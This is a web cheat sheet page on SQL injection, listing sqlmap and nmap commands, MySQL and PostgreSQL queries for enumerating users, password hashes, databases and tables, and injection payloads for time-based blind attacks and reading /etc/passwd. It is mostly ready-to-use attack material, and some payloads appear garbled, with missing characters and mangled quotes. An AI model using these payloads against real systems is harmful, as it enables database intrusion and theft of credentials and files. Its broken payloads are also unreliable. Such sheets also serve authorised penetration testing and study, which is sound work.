Show Menu
Cheatography

Injection SQL Cheat Sheet by

Automated tools

SQLMAP
sqlmap -u "­url­" --forms --batch --crawl=10 --level=5 --risk=3
NMAP
nmap -p80 --scri­pt=­htt­p-s­ql-­inj­ection --scri­pt-­arg­s=h­ttp­spi­der.ma­xpa­geo­cou­nt=200 <ta­rge­t>

Mysql

Version
SELECT @@version;
Comments
/ / ou #
Current user
SELECT user(); || SELECT system­_user()
List users
SELECT user FROM mysql.u­ser;
List password hashes
SELECT host, user, password FROM mysql.u­ser;
Current database
SELECT database()
List databases
SELECT schema­_name FROM inform­ati­on_­sch­ema.sc­hemata; || SELECT distin­ct(db) FROM mysql.db
List tables
SELECT table_­sch­ema­,ta­ble­_name FROM inform­ati­on_­sch­ema.tables WHERE table_­schema != ‘mysql’ AND table_­schema != ‘infor­mat­ion­_sc­hema’
List collumns
SELECT table_­schema, table_­name, column­_name FROM inform­ati­on_­sch­ema.co­lumns WHERE table_­schema != ‘mysql’ AND table_­schema != ‘infor­mat­ion­_sc­hema’
Find Tables From Column Name
SELECT table_­schema, table_name FROM inform­ati­on_­sch­ema.co­lumns WHERE column­_name = ‘usern­ame’;
Time delay
SELECT BENCHM­ARK­(10­000­00,­MD5­(‘A’)); SELECT SLEEP(5); # >= 5.0.12
Local File Access
…’ UNION ALL SELECT LOAD_F­ILE­(‘/­etc­/pa­sswd’) —
Hostna­me/IP Address
SELECT @@host­name;
Create user
CREATE USER test1 IDENTIFIED BY ‘pass1′; —
Delete user
DROP USER test1; —
Location of the db file
SELECT @@datadir;
 

SQLMAP

sqlmap -u "­url­" -DBS
sqlmap -u "­url­" -table -D [database]
sqlmap -u "­url­" -columns -D [database] -T [table]
sqlmap -u "­url­" -dump -D [database] -T [table]

Manually Attack

Quick detect INTEGERS
select 1 and row(1,­1)>­(select count(­),­con­cat­(CO­NCA­T(@­@VE­RSI­ON)­,0x­3a,­flo­or(­ran­d()­2))x from (select 1 union select 2)a group by x limit 1))
Quick detect STRINGS
'+(select 1 and row(1,­1)>­(select count(­),­con­cat­(CO­NCA­T(@­@VE­RSI­ON)­,0x­3a,­flo­or(­ran­d()­2))x from (select 1 union select 2)a group by x limit 1))+'
Clear SQL Test
produc­t.p­hp?id=4 produc­t.p­hp?­id=5-1 produc­t.p­hp?id=4 OR 1=1 produc­t.p­hp?­id=-1 OR 17-7=10
Blind SQL Injection
SLEEP(­25)-- SELECT BENCHM­ARK­(10­000­00,­MD5­('A'));
Real world sample
Produc­tID=1 OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1) OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1' OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1') OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1)) OR SLEEP(­25)=0 LIMIT 1-- Produc­tID­=SELECT SLEEP(­25)--

PostgreSQL

Version
SELECT version()
Comments
-comment | / comment /
Current user
SELECT user; SELECT curren­t_user; SELECT sessio­n_user; SELECT usename FROM pg_user; SELECT getpgu­ser­name();
List users
SELECT usename FROM pg_user
List DBA Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
List password hashes
SELECT usename, passwd FROM pg_shadow — priv
Current database
SELECT curren­t_d­ata­base()
List databases
SELECT datname FROM pg_dat­abase
List tables
SELECT c.relname FROM pg_cat­alo­g.p­g_class c LEFT JOIN pg_cat­alo­g.p­g_n­ame­space n ON n.oid = c.reln­ame­space WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_c­ata­log’, ‘pg_to­ast’) AND pg_cat­alo­g.p­g_t­abl­e_i­s_v­isi­ble­(c.oid)
List collumns
SELECT relname, A.attname FROM pg_class C, pg_nam­espace N, pg_att­ribute A, pg_type T WHERE (C.rel­kin­d=’r') AND (N.oid­=C.r­el­nam­espace) AND (A.att­rel­id=­C.oid) AND (A.att­typ­id=­T.oid) AND (A.att­num­>0) AND (NOT A.atti­sdr­opped) AND (N.nspname ILIKE ‘public’)
Find Tables From Column Name
SELECT DISTINCT relname FROM pg_class C, pg_nam­espace N, pg_att­ribute A, pg_type T WHERE (C.rel­kin­d=’r') AND (N.oid­=C.r­el­nam­espace) AND (A.att­rel­id=­C.oid) AND (A.att­typ­id=­T.oid) AND (A.att­num­>0) AND (NOT A.atti­sdr­opped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%pass­word%’;
Time delay
SELECT pg_sle­ep(10);
Local File Access
CREATE TABLE mydata(t text); COPY mydata FROM ‘/etc/­pas­swd’;
Hostna­me/IP Address
SELECT inet_s­erv­er_­addr();
Port
SELECT inet_s­erv­er_­port();
Create user
CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER
Delete user
DROP USER test1;
Location of the db file
SELECT curren­t_s­ett­ing­(‘d­ata­_di­rec­tory’);
       

Help Us Go Positive!

We offset our carbon usage with Ecologi. Click the link below to help us!

We offset our carbon footprint via Ecologi
 

Comments

No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Cisco Device Security Cheat Sheet